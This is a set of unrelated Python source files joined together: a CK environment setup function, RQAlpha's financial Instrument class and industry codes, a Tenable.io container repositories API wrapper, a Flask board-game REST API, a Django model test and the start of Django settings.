# setup environment setup
def setup(i):
"""
Input: {
cfg - meta of this soft entry
self_cfg - meta of module soft
ck_kernel - import CK kernel module (to reuse functions)
host_os_uoa - host OS UOA
host_os_uid - host OS UID
host_os_dict - host OS meta
target_os_uoa - target OS UOA
target_os_uid - target OS UID
target_os_dict - target OS meta
target_device_id - target device ID (if via ADB)
tags - list of tags used to search this entry
env - updated environment vars from meta
customize - updated customize vars from meta
deps - resolved dependencies for this soft
interactive - if 'yes', can ask questions, otherwise quiet
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
bat - prepared string for bat file
}
"""
import os
# Get variables
ck=i['ck_kernel']
s=''
iv=i.get('interactive','')
cus=i.get('customize',{})
fp=cus.get('full_path','')
env=i['env']
hosd=i['host_os_dict']
tosd=i['target_os_dict']
sdirs=hosd.get('dir_sep','')
# Check platform
hplat=hosd.get('ck_name','')
hproc=hosd.get('processor','')
tproc=tosd.get('processor','')
remote=tosd.get('remote','')
tbits=tosd.get('bits','')
pi=os.path.dirname(fp)
ep=cus['env_prefix']
env[ep]=pi
x=cus.get('file_model','')
if x!='':
env[ep+'_PT_NAME']=x
env[ep+'_PT']=pi+sdirs+x
x=cus.get('file_model_pttxt','')
if x!='':
env[ep+'_PTTXT_NAME']=x
env[ep+'_PTTXT']=pi+sdirs+x
x=cus.get('file_labels','')
if x!='':
env[ep+'_LABELS_NAME']=x
env[ep+'_LABELS']=pi+sdirs+x
# Call common script
r=ck.access({'action':'run', 'module_uoa':'script', 'data_uoa':'process-model',
'code':'common_vars', 'func':'process',
'dict':i})
if r['return']>0: return r
env.update(r['env'])
return {'return':0, 'bat':s}
|
py | 7dfa87c8aa4a182d72999259ff849cfa8f2f1f28 | # -*- coding: utf-8 -*-
# 版权所有 2019 深圳米筐科技有限公司(下称“米筐科技”)
#
# 除非遵守当前许可,否则不得使用本软件。
#
# * 非商业用途(非商业用途指个人出于非商业目的使用本软件,或者高校、研究所等非营利机构出于教育、科研等目的使用本软件):
# 遵守 Apache License 2.0(下称“Apache 2.0 许可”),
# 您可以在以下位置获得 Apache 2.0 许可的副本:http://www.apache.org/licenses/LICENSE-2.0。
# 除非法律有要求或以书面形式达成协议,否则本软件分发时需保持当前许可“原样”不变,且不得附加任何条件。
#
# * 商业用途(商业用途指个人出于任何商业目的使用本软件,或者法人或其他组织出于任何目的使用本软件):
# 未经米筐科技授权,任何个人不得出于任何商业目的使用本软件(包括但不限于向第三方提供、销售、出租、出借、转让本软件、
# 本软件的衍生产品、引用或借鉴了本软件功能或源代码的产品或服务),任何法人或其他组织不得出于任何目的使用本软件,
# 否则米筐科技有权追究相应的知识产权侵权责任。
# 在此前提下,对本软件的使用同样需要遵守 Apache 2.0 许可,Apache 2.0 许可与本许可冲突之处,以本许可为准。
# 详细的授权流程,请联系 [email protected] 获取。
import copy
import datetime
import numpy as np
from rqalpha.environment import Environment
from rqalpha.const import INSTRUMENT_TYPE, POSITION_DIRECTION, DEFAULT_ACCOUNT_TYPE
from rqalpha.utils import TimeRange, INST_TYPE_IN_STOCK_ACCOUNT
from rqalpha.utils.repr import property_repr, PropertyReprMeta
class Instrument(metaclass=PropertyReprMeta):
DEFAULT_LISTED_DATE = datetime.datetime(1990, 1, 1)
DEFAULT_DE_LISTED_DATE = datetime.datetime(2999, 12, 31)
@staticmethod
def _fix_date(ds, dflt):
if isinstance(ds, datetime.datetime):
return ds
if ds == '0000-00-00':
return dflt
year, month, day = ds.split('-')
return datetime.datetime(int(year), int(month), int(day))
__repr__ = property_repr
def __init__(self, dic, future_info_store=None):
self.__dict__ = copy.copy(dic)
self._future_info_store = future_info_store
if "listed_date" in dic:
self.__dict__["listed_date"] = self._fix_date(dic["listed_date"], self.DEFAULT_LISTED_DATE)
if "de_listed_date" in dic:
self.__dict__["de_listed_date"] = self._fix_date(dic["de_listed_date"], self.DEFAULT_DE_LISTED_DATE)
if "maturity_date" in self.__dict__:
self.__dict__["maturity_date"] = self._fix_date(dic["maturity_date"], self.DEFAULT_DE_LISTED_DATE)
if 'contract_multiplier' in dic:
if np.isnan(self.contract_multiplier):
raise RuntimeError("Contract multiplier of {} is not supposed to be nan".format(self.order_book_id))
@property
def order_book_id(self):
# type: () -> str
"""
[str] 股票:证券代码,证券的独特的标识符。应以’.XSHG’或’.XSHE’结尾,前者代表上证,后者代表深证。
期货:期货代码,期货的独特的标识符(郑商所期货合约数字部分进行了补齐。例如原有代码’ZC609’补齐之后变为’ZC1609’)。
主力连续合约UnderlyingSymbol+88,例如’IF88’ ;指数连续合约命名规则为UnderlyingSymbol+99
"""
return self.__dict__["order_book_id"]
@property
def symbol(self):
# type: () -> str
"""
[str] 股票:证券的简称,例如’平安银行’。期货:期货的简称,例如’沪深1005’。
"""
return self.__dict__["symbol"]
@property
def round_lot(self):
# type: () -> int
"""
[int] 股票:一手对应多少股,中国A股一手是100股。期货:一律为1。
"""
return self.__dict__["round_lot"]
@property
def listed_date(self):
# type: () -> datetime.datetime
"""
[datetime] 股票:该证券上市日期。期货:期货的上市日期,主力连续合约与指数连续合约都为 datetime(1990, 1, 1)。
"""
return self.__dict__["listed_date"]
@property
def de_listed_date(self):
# type: () -> datetime.datetime
"""
[datetime] 股票:退市日期。期货:交割日期。
"""
return self.__dict__["de_listed_date"]
@property
def type(self):
# type: () -> str
"""
[sty] 合约类型,目前支持的类型有: ‘CS’, ‘INDX’, ‘LOF’, ‘ETF’, ‘Future’
"""
return INSTRUMENT_TYPE[self.__dict__["type"]]
@property
def exchange(self):
# type: () -> str
"""
[str] 交易所。股票:’XSHE’ - 深交所, ‘XSHG’ - 上交所。期货:’DCE’ - 大连商品交易所, ‘SHFE’ - 上海期货交易所,
’CFFEX’ - 中国金融期货交易所, ‘CZCE’- 郑州商品交易所
"""
return self.__dict__["exchange"]
@property
def market_tplus(self):
# type: () -> int
"""
[int] 合约卖出和买入操作需要间隔的最小交易日数,如A股为 1
公募基金的 market_tplus 默认0
"""
return self.__dict__.get("market_tplus") or 0
@property
def sector_code(self):
"""
[str] 板块缩写代码,全球通用标准定义(股票专用)
"""
try:
return self.__dict__["sector_code"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'sector_code' ".format(self.order_book_id)
)
@property
def sector_code_name(self):
"""
[str] 以当地语言为标准的板块代码名(股票专用)
"""
try:
return self.__dict__["sector_code_name"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'sector_code_name' ".format(self.order_book_id)
)
@property
def industry_code(self):
"""
[str] 国民经济行业分类代码,具体可参考“Industry列表” (股票专用)
"""
try:
return self.__dict__["industry_code"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'industry_code' ".format(self.order_book_id)
)
@property
def industry_name(self):
"""
[str] 国民经济行业分类名称(股票专用)
"""
try:
return self.__dict__["industry_name"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'industry_name' ".format(self.order_book_id)
)
@property
def concept_names(self):
"""
[str] 概念股分类,例如:’铁路基建’,’基金重仓’等(股票专用)
"""
try:
return self.__dict__["concept_names"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'concept_names' ".format(self.order_book_id)
)
@property
def board_type(self):
"""
[str] 板块类别,’MainBoard’ - 主板,’GEM’ - 创业板(股票专用)
"""
try:
return self.__dict__["board_type"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'board_type' ".format(self.order_book_id)
)
@property
def status(self):
"""
[str] 合约状态。’Active’ - 正常上市, ‘Delisted’ - 终止上市, ‘TemporarySuspended’ - 暂停上市,
‘PreIPO’ - 发行配售期间, ‘FailIPO’ - 发行失败(股票专用)
"""
try:
return self.__dict__["status"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'status' ".format(self.order_book_id)
)
@property
def special_type(self):
"""
[str] 特别处理状态。’Normal’ - 正常上市, ‘ST’ - ST处理, ‘StarST’ - *ST代表该股票正在接受退市警告,
‘PT’ - 代表该股票连续3年收入为负,将被暂停交易, ‘Other’ - 其他(股票专用)
"""
try:
return self.__dict__["special_type"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'special_type' ".format(self.order_book_id)
)
@property
def contract_multiplier(self):
"""
[float] 合约乘数,例如沪深300股指期货的乘数为300.0(期货专用)
"""
return self.__dict__.get('contract_multiplier', 1)
@property
def margin_rate(self):
"""
[float] 合约最低保证金率(期货专用)
"""
return self.__dict__.get("margin_rate", 1)
@property
def underlying_order_book_id(self):
"""
[str] 合约标的代码,目前除股指期货(IH, IF, IC)之外的期货合约,这一字段全部为’null’(期货专用)
"""
try:
return self.__dict__["underlying_order_book_id"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'underlying_order_book_id' ".format(self.order_book_id)
)
@property
def underlying_symbol(self):
"""
[str] 合约标的代码,目前除股指期货(IH, IF, IC)之外的期货合约,这一字段全部为’null’(期货专用)
"""
try:
return self.__dict__["underlying_symbol"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'underlying_symbol' ".format(self.order_book_id)
)
@property
def maturity_date(self):
# type: () -> datetime.datetime
"""
[datetime] 到期日
"""
try:
return self.__dict__["maturity_date"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'maturity_date' ".format(self.order_book_id)
)
@property
def settlement_method(self):
"""
[str] 交割方式,’CashSettlementRequired’ - 现金交割, ‘PhysicalSettlementRequired’ - 实物交割(期货专用)
"""
try:
return self.__dict__["settlement_method"]
except (KeyError, ValueError):
raise AttributeError(
"Instrument(order_book_id={}) has no attribute 'settlement_method' ".format(self.order_book_id)
)
@property
def listing(self):
"""
[bool] 该合约当前日期是否在交易
"""
trading_dt = Environment.get_instance().trading_dt
return self.listing_at(trading_dt)
@property
def listed(self):
"""
[bool] 该合约当前交易日是否已上市
"""
return self.listed_at(Environment.get_instance().trading_dt)
@property
def de_listed(self):
"""
[bool] 该合约当前交易日是否已退市
"""
return self.de_listed_at(Environment.get_instance().trading_dt)
@property
def account_type(self):
if self.type in INST_TYPE_IN_STOCK_ACCOUNT:
return DEFAULT_ACCOUNT_TYPE.STOCK
elif self.type == INSTRUMENT_TYPE.FUTURE:
return DEFAULT_ACCOUNT_TYPE.FUTURE
else:
raise NotImplementedError
def listing_at(self, dt):
"""
该合约在指定日期是否在交易
:param dt: datetime.datetime
:return: bool
"""
return self.listed_at(dt) and not self.de_listed_at(dt)
def listed_at(self, dt):
"""
该合约在指定日期是否已上日
:param dt: datetime.datetime
:return: bool
"""
return self.listed_date <= dt
def de_listed_at(self, dt):
"""
该合约在指定日期是否已退市
:param dt: datetime.datetime
:return: bool
"""
if self.type in (INSTRUMENT_TYPE.FUTURE, INSTRUMENT_TYPE.OPTION):
return dt.date() > self.de_listed_date.date()
else:
return dt >= self.de_listed_date
STOCK_TRADING_PERIOD = [
TimeRange(start=datetime.time(9, 31), end=datetime.time(11, 30)),
TimeRange(start=datetime.time(13, 1), end=datetime.time(15, 0)),
]
@property
def trading_hours(self):
# trading_hours='09:31-11:30,13:01-15:00'
try:
trading_hours = self.__dict__["trading_hours"]
except KeyError:
if self.type in INST_TYPE_IN_STOCK_ACCOUNT:
return self.STOCK_TRADING_PERIOD
return None
trading_period = []
trading_hours = trading_hours.replace("-", ":")
for time_range_str in trading_hours.split(","):
start_h, start_m, end_h, end_m = (int(i) for i in time_range_str.split(":"))
start, end = datetime.time(start_h, start_m), datetime.time(end_h, end_m)
if start > end:
trading_period.append(TimeRange(start, datetime.time(23, 59)))
trading_period.append(TimeRange(datetime.time(0, 0), end))
else:
trading_period.append(TimeRange(start, end))
return trading_period
@property
def trade_at_night(self):
return any(r.start <= datetime.time(4, 0) or r.end >= datetime.time(19, 0) for r in (self.trading_hours or []))
def days_from_listed(self):
if self.listed_date == self.DEFAULT_LISTED_DATE:
return -1
date = Environment.get_instance().trading_dt.date()
if self.de_listed_date.date() < date:
return -1
ipo_days = (date - self.listed_date.date()).days
return ipo_days if ipo_days >= 0 else -1
def days_to_expire(self):
if self.type != 'Future' or self.order_book_id[-2:] == '88' or self.order_book_id[-2:] == '99':
return -1
date = Environment.get_instance().trading_dt.date()
days = (self.maturity_date.date() - date).days
return -1 if days < 0 else days
def tick_size(self):
if self.type in (INSTRUMENT_TYPE.CS, INSTRUMENT_TYPE.INDX):
return 0.01
elif self.type in ("ETF", "LOF"):
return 0.001
elif self.type == INSTRUMENT_TYPE.FUTURE:
return self._future_info_store.get_future_info(self)["tick_size"]
else:
raise NotImplementedError
def calc_cash_occupation(self, price, quantity, direction):
# type: (float, float, POSITION_DIRECTION) -> float
if self.type in INST_TYPE_IN_STOCK_ACCOUNT:
return price * quantity
elif self.type == INSTRUMENT_TYPE.FUTURE:
margin_multiplier = Environment.get_instance().config.base.margin_multiplier
return price * quantity * self.contract_multiplier * self.margin_rate * margin_multiplier
else:
raise NotImplementedError
class SectorCodeItem(object):
def __init__(self, cn, en, name):
self.__cn = cn
self.__en = en
self.__name = name
@property
def cn(self):
return self.__cn
@property
def en(self):
return self.__en
@property
def name(self):
return self.__name
def __repr__(self):
return "{}: {}, {}".format(self.__name, self.__en, self.__cn)
class SectorCode(object):
Energy = SectorCodeItem("能源", "energy", 'Energy')
Materials = SectorCodeItem("原材料", "materials", 'Materials')
ConsumerDiscretionary = SectorCodeItem("非必需消费品", "consumer discretionary", 'ConsumerDiscretionary')
ConsumerStaples = SectorCodeItem("必需消费品", "consumer staples", 'ConsumerStaples')
HealthCare = SectorCodeItem("医疗保健", "health care", 'HealthCare')
Financials = SectorCodeItem("金融", "financials", 'Financials')
InformationTechnology = SectorCodeItem("信息技术", "information technology", 'InformationTechnology')
TelecommunicationServices = SectorCodeItem("电信服务", "telecommunication services", 'TelecommunicationServices')
Utilities = SectorCodeItem("公共服务", "utilities", 'Utilities')
Industrials = SectorCodeItem("工业", "industrials", "Industrials")
class IndustryCodeItem(object):
def __init__(self, code, name):
self.__code = code
self.__name = name
@property
def code(self):
return self.__code
@property
def name(self):
return self.__name
def __repr__(self):
return "{0}:{1}".format(self.__code, self.__name)
class IndustryCode(object):
A01 = IndustryCodeItem("A01", "农业")
A02 = IndustryCodeItem("A02", "林业")
A03 = IndustryCodeItem("A03", "畜牧业")
A04 = IndustryCodeItem("A04", "渔业")
A05 = IndustryCodeItem("A05", "农、林、牧、渔服务业")
B06 = IndustryCodeItem("B06", "煤炭开采和洗选业")
B07 = IndustryCodeItem("B07", "石油和天然气开采业")
B08 = IndustryCodeItem("B08", "黑色金属矿采选业")
B09 = IndustryCodeItem("B09", "有色金属矿采选业")
B10 = IndustryCodeItem("B10", "非金属矿采选业")
B11 = IndustryCodeItem("B11", "开采辅助活动")
B12 = IndustryCodeItem("B12", "其他采矿业")
C13 = IndustryCodeItem("C13", "农副食品加工业")
C14 = IndustryCodeItem("C14", "食品制造业")
C15 = IndustryCodeItem("C15", "酒、饮料和精制茶制造业")
C16 = IndustryCodeItem("C16", "烟草制品业")
C17 = IndustryCodeItem("C17", "纺织业")
C18 = IndustryCodeItem("C18", "纺织服装、服饰业")
C19 = IndustryCodeItem("C19", "皮革、毛皮、羽毛及其制品和制鞋业")
C20 = IndustryCodeItem("C20", "木材加工及木、竹、藤、棕、草制品业")
C21 = IndustryCodeItem("C21", "家具制造业")
C22 = IndustryCodeItem("C22", "造纸及纸制品业")
C23 = IndustryCodeItem("C23", "印刷和记录媒介复制业")
C24 = IndustryCodeItem("C24", "文教、工美、体育和娱乐用品制造业")
C25 = IndustryCodeItem("C25", "石油加工、炼焦及核燃料加工业")
C26 = IndustryCodeItem("C26", "化学原料及化学制品制造业")
C27 = IndustryCodeItem("C27", "医药制造业")
C28 = IndustryCodeItem("C28", "化学纤维制造业")
C29 = IndustryCodeItem("C29", "橡胶和塑料制品业")
C30 = IndustryCodeItem("C30", "非金属矿物制品业")
C31 = IndustryCodeItem("C31", "黑色金属冶炼及压延加工业")
C32 = IndustryCodeItem("C32", "有色金属冶炼和压延加工业")
C33 = IndustryCodeItem("C33", "金属制品业")
C34 = IndustryCodeItem("C34", "通用设备制造业")
C35 = IndustryCodeItem("C35", "专用设备制造业")
C36 = IndustryCodeItem("C36", "汽车制造业")
C37 = IndustryCodeItem("C37", "铁路、船舶、航空航天和其它运输设备制造业")
C38 = IndustryCodeItem("C38", "电气机械及器材制造业")
C39 = IndustryCodeItem("C39", "计算机、通信和其他电子设备制造业")
C40 = IndustryCodeItem("C40", "仪器仪表制造业")
C41 = IndustryCodeItem("C41", "其他制造业")
C42 = IndustryCodeItem("C42", "废弃资源综合利用业")
C43 = IndustryCodeItem("C43", "金属制品、机械和设备修理业")
D44 = IndustryCodeItem("D44", "电力、热力生产和供应业")
D45 = IndustryCodeItem("D45", "燃气生产和供应业")
D46 = IndustryCodeItem("D46", "水的生产和供应业")
E47 = IndustryCodeItem("E47", "房屋建筑业")
E48 = IndustryCodeItem("E48", "土木工程建筑业")
E49 = IndustryCodeItem("E49", "建筑安装业")
E50 = IndustryCodeItem("E50", "建筑装饰和其他建筑业")
F51 = IndustryCodeItem("F51", "批发业")
F52 = IndustryCodeItem("F52", "零售业")
G53 = IndustryCodeItem("G53", "铁路运输业")
G54 = IndustryCodeItem("G54", "道路运输业")
G55 = IndustryCodeItem("G55", "水上运输业")
G56 = IndustryCodeItem("G56", "航空运输业")
G57 = IndustryCodeItem("G57", "管道运输业")
G58 = IndustryCodeItem("G58", "装卸搬运和运输代理业")
G59 = IndustryCodeItem("G59", "仓储业")
G60 = IndustryCodeItem("G60", "邮政业")
H61 = IndustryCodeItem("H61", "住宿业")
H62 = IndustryCodeItem("H62", "餐饮业")
I63 = IndustryCodeItem("I63", "电信、广播电视和卫星传输服务")
I64 = IndustryCodeItem("I64", "互联网和相关服务")
I65 = IndustryCodeItem("I65", "软件和信息技术服务业")
J66 = IndustryCodeItem("J66", "货币金融服务")
J67 = IndustryCodeItem("J67", "资本市场服务")
J68 = IndustryCodeItem("J68", "保险业")
J69 = IndustryCodeItem("J69", "其他金融业")
K70 = IndustryCodeItem("K70", "房地产业")
L71 = IndustryCodeItem("L71", "租赁业")
L72 = IndustryCodeItem("L72", "商务服务业")
M73 = IndustryCodeItem("M73", "研究和试验发展")
M74 = IndustryCodeItem("M74", "专业技术服务业")
M75 = IndustryCodeItem("M75", "科技推广和应用服务业")
N76 = IndustryCodeItem("N76", "水利管理业")
N77 = IndustryCodeItem("N77", "生态保护和环境治理业")
N78 = IndustryCodeItem("N78", "公共设施管理业")
O79 = IndustryCodeItem("O79", "居民服务业")
O80 = IndustryCodeItem("O80", "机动车、电子产品和日用产品修理业")
O81 = IndustryCodeItem("O81", "其他服务业")
P82 = IndustryCodeItem("P82", "教育")
Q83 = IndustryCodeItem("Q83", "卫生")
Q84 = IndustryCodeItem("Q84", "社会工作")
R85 = IndustryCodeItem("R85", "新闻和出版业")
R86 = IndustryCodeItem("R86", "广播、电视、电影和影视录音制作业")
R87 = IndustryCodeItem("R87", "文化艺术业")
R88 = IndustryCodeItem("R88", "体育")
R89 = IndustryCodeItem("R89", "娱乐业")
S90 = IndustryCodeItem("S90", "综合")
|
py | 7dfa880f192d4a315e8d83f717dc2ae581bfa50a | '''
Repositories
============
The following methods allow for interaction into the Tenable.io
Container Security :devportal:`repositories <cs-v2-repositories>`
API endpoints.
Methods available on ``tio.cs.repositories``:
.. rst-class:: hide-signature
.. autoclass:: RepositoriesAPI
:members:
'''
from typing import Optional, Dict, Union
from restfly.utils import dict_clean
from tenable.base.endpoint import APIEndpoint
from tenable.io.cs.iterator import CSIterator
class RepositoriesAPI(APIEndpoint):
_path = 'container_security/api/v2/repositories'
_box = True
_box_attrs = {'camel_killer_box': True}
def list(self, # noqa: PLC0103,PLR0913
name: Optional[str] = None,
contains: Optional[str] = None,
offset: int = 0,
limit: int = 1000,
return_json: bool = False
) -> Union[Dict, CSIterator]:
'''
Returns the list of images stored within Container Security.
:devportal:`API Documentation <container-security-v2-list-repositories>` # noqa: E501
Args:
name (str, optional):
Image name to filter on. Filter is case-sensitive
and enforces an exact match.
contains (str, optional):
Partial name to filter on. Filter is case-sensitive.
offset (int, optional):
The number of records to skip before starting to return data.
limit (int, optional):
The number of records to return for each page of data.
return_json (bool, optional):
If set, then the response will instead be a Dict object instead
of an iterable.
Examples:
Using the default iterable:
>>> for repo in tio.cs.repositories.list():
... print(repo)
Getting the raw JSON response:
>>> resp = tio.cs.repositories.list(return_json=True)
>>> for item in resp['items']:
... print(item)
'''
params = dict_clean({
'offset': offset,
'limit': limit,
'name': name,
'contains': contains,
})
if return_json:
return self._get(params=params)
return CSIterator(self._api,
_path=self._path,
_params=params,
_limit=limit,
_offset=offset
)
def details(self, name: str) -> Dict:
'''
Returns the details for the specified repository.
:devportal:`API Documentation <container-security-v2-get-repository-details>` # noqa: E501
Args:
name (str):
The repository name.
Examples:
>>> tio.cs.repositories.details('centos')
'''
return self._get(name)
def delete(self, name: str) -> None:
'''
Deleted the specified repository.
:devportal:`API Documentation <container-security-v2-delete-repository>` # noqa: E501
Args:
name (str):
The repository name.
Examples:
>>> tio.cs.repositories.delete('centos')
'''
self._delete(name)
|
py | 7dfa88453325d7ad30fda08b6234f7e9152715be | from flask import Flask, escape, request, abort
from conexiones.auth_client import AuthClient
from conexiones.hub_client import HubClient
from juego.partida import Partida
from juego.datos.jugador import Jugador
from juego.fabrica_tres_raya import FabricaTresRaya
from juego.fabrica_conecta_cuatro import FabricaConectaCuatro
import json
import os
class RestApi:
""" Clase fachada de la API REST
---
Esta clase es una fachada con las operaciones proporcionadas a través de la API REST.
"""
JUEGOS = {"TresRaya" : FabricaTresRaya,
"Conecta4" : FabricaConectaCuatro}
def __init__(self, tipo):
""" Constructor.
---
Parametros:
- tipo: String con el nombre del juego.
"""
self.__fabrica_juego = RestApi.JUEGOS.get(tipo)()
self.__partida = Partida(self.__fabrica_juego)
self.__finalizar = False
game = os.getenv('GAME')
host = os.getenv('GAME_SERVER_HOST', '172.0.0.1')
port = os.getenv('GAME_SERVER_PORT', 6789)
HubClient.instance().register(game, host, port)
def status(self, request):
""" Controlador de estado.
---
Siempre devuelve una tupla con el código de estado 200 y un mensaje "OK".
"""
return (200, 'OK')
def registrar_jugador(self, request):
""" Registra un jugador en la partida.
---
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'OK') cuando se ha registrado con éxito.
- (401, 'Unauthorized') cuando el token es invalido.
- (500, 'Server error') cuando la partida esta llena.
"""
token = request.form['token']
auth = AuthClient.instance()
if not auth.validate_token(token):
return (401, 'Unauthorized')
jugador = Jugador(token)
if not self.__partida.registrar_jugador(jugador):
return (500, 'Server error')
return (200, 'OK')
def comprobar_turno(self, request):
""" Comprueba el turno de un jugador.
---
Devuelve True si el jugador tiene el turno, sino False.
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, True o False) comprobación correcta.
- (401, 'Unauthorized') cuando el token es invalido.
"""
token = request.form['token']
auth = AuthClient.instance()
if not auth.validate_token(token):
return (401, 'Unauthorized')
turno = self.__partida.obtener_turno().obtener_token() == token
return (200, json.dumps(turno))
def realizar_jugada(self, request):
""" Realiza una jugada en la partida.
---
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'OK') cuando se ha realizado con éxito.
- (400, 'Bad Request') cuando las coordenadas son invalidas o la partida esta acabada.
- (401, 'Unauthorized') cuando el token es invalido.
"""
token = request.form['token']
auth = AuthClient.instance()
turno = self.__partida.obtener_turno()
if not auth.validate_token(token) or turno.obtener_token() != token:
return (401, 'Unauthorized')
try:
x = int(request.form['x'])
y = int(request.form['y'])
self.__partida.jugar(x,y)
return (200, 'OK')
except:
return (400, 'Bad Request')
def obtener_tablero(self, request):
""" Devuelve el tablero en forma de matriz.
---
El tablero esta en formato JSON.
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'OK') cuando se ha devuelto con éxito.
"""
tablero = self.__partida.obtener_tablero().obtener_array()
out = [[None if pieza is None else str(pieza) for pieza in x] for x in tablero]
return (200, json.dumps(out))
def esta_acabado(self, request):
""" Comprueba si la partida esta acabada.
---
Devuelve True si la partida esta acabada, sino False.
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, True o False) comprobación correcta.
"""
acabado = self.__partida.esta_acabado()
return (200, json.dumps(acabado))
def obtener_resultado(self, request):
""" Devuelve el resultado obtenido por el jugador.
---
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'Ganador', 'Perdedor' o 'Empate') comprobación correcta.
- (400, 'Bad Request') cuando la partida no esta acabada.
- (401, 'Unauthorized') cuando el token es invalido.
"""
token = request.form['token']
auth = AuthClient.instance()
if not auth.validate_token(token):
return (401, 'Unauthorized')
if not self.__partida.esta_acabado():
return (400, 'Bad Request')
ganador = self.__partida.obtener_ganador()
if ganador is None:
resultado = 'Empate'
elif token == ganador.obtener_token():
resultado = 'Ganador'
else:
resultado = 'Perdedor'
return (200, resultado)
def finalizar_partida(self, request):
""" Finaliza la partide e inicializa otra cuando los dos clientes realizan esta petición.
---
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'OK') operación correcta.
- (401, 'Unauthorized') cuando el token es invalido.
"""
token = request.form['token']
auth = AuthClient.instance()
if not auth.validate_token(token):
return (401, 'Unauthorized')
if self.__finalizar:
self.__partida = Partida(self.__fabrica_juego)
self.__finalizar = False
else:
ganador = self.__partida.obtener_ganador()
perdedor = self.__partida.obtener_perdedor()
if ganador is not None:
auth.add_score(ganador.obtener_token(), 1, 1, 0)
auth.add_score(perdedor.obtener_token(), -1, 0, 1)
self.__finalizar = True
return (200, 'OK')
|
py | 7dfa88aea18262d50103b061d7ffedf6d132e3aa | from django.test import TestCase
from django.db import IntegrityError
from nose.tools import raises, assert_equals, assert_is_not_none
from api.models import Concept
from utils import factories
class ConceptTest(TestCase):
def setUp(self):
self.name = 'SX SITE SWELLING'
self.display_name = 'Swelling at surgical site'
def test_concept_required(self):
concept = Concept.objects.create(
name=self.name,
display_name=self.display_name
)
assert_equals(len(concept.uuid.hex), 32)
assert_equals(concept.name, self.name)
assert_equals(concept.display_name, self.display_name)
def test_concepts_all_properties(self):
Concept.objects.create(
name=self.name,
display_name=self.display_name,
description='Swelling observed at surgical site post procedure',
data_type='string',
mime_type='text/plain',
constraint='yes;no'
)
concept = Concept.objects.get(name='SX SITE SWELLING')
assert_equals(len(concept.uuid.hex), 32)
assert_is_not_none(concept.created)
assert_is_not_none(concept.last_modified)
assert_equals(concept.name, self.name)
assert_equals(concept.display_name, self.display_name)
assert_equals(concept.description, 'Swelling observed at surgical site post procedure')
assert_equals(concept.data_type, 'string')
assert_equals(concept.mime_type, 'text/plain')
assert_equals(concept.constraint, 'yes;no')
@raises(IntegrityError)
def test_concept_type_invalid(self):
Concept.objects.create(
name=self.name,
display_name=self.display_name,
data_type='bad'
)
def test_data_type_string(self):
self.assert_data_type_valid('string')
def test_data_type_boolean(self):
self.assert_data_type_valid('boolean')
def test_data_type_number(self):
self.assert_data_type_valid('number')
def test_data_type_complex(self):
self.assert_data_type_valid('complex')
# HELPERS
def assert_data_type_valid(self, data_type):
concept = factories.ConceptFactory(
data_type=data_type
)
assert_is_not_none(concept)
|
py | 7dfa896fdfa24c3d5669827df44bfb0f6bd79007 | # -*- coding: utf-8 -*-
"""
Django settings for pkg project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (pkg/config/settings/common.py - 3 = pkg/)
APPS_DIR = ROOT_DIR.path('pkg')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
# Apps specific for this project go here.
LOCAL_APPS = (
'pkg.users', # custom users app
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'pkg.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool('DJANGO_DEBUG', False)
# FIXTURE CONFIGURATION
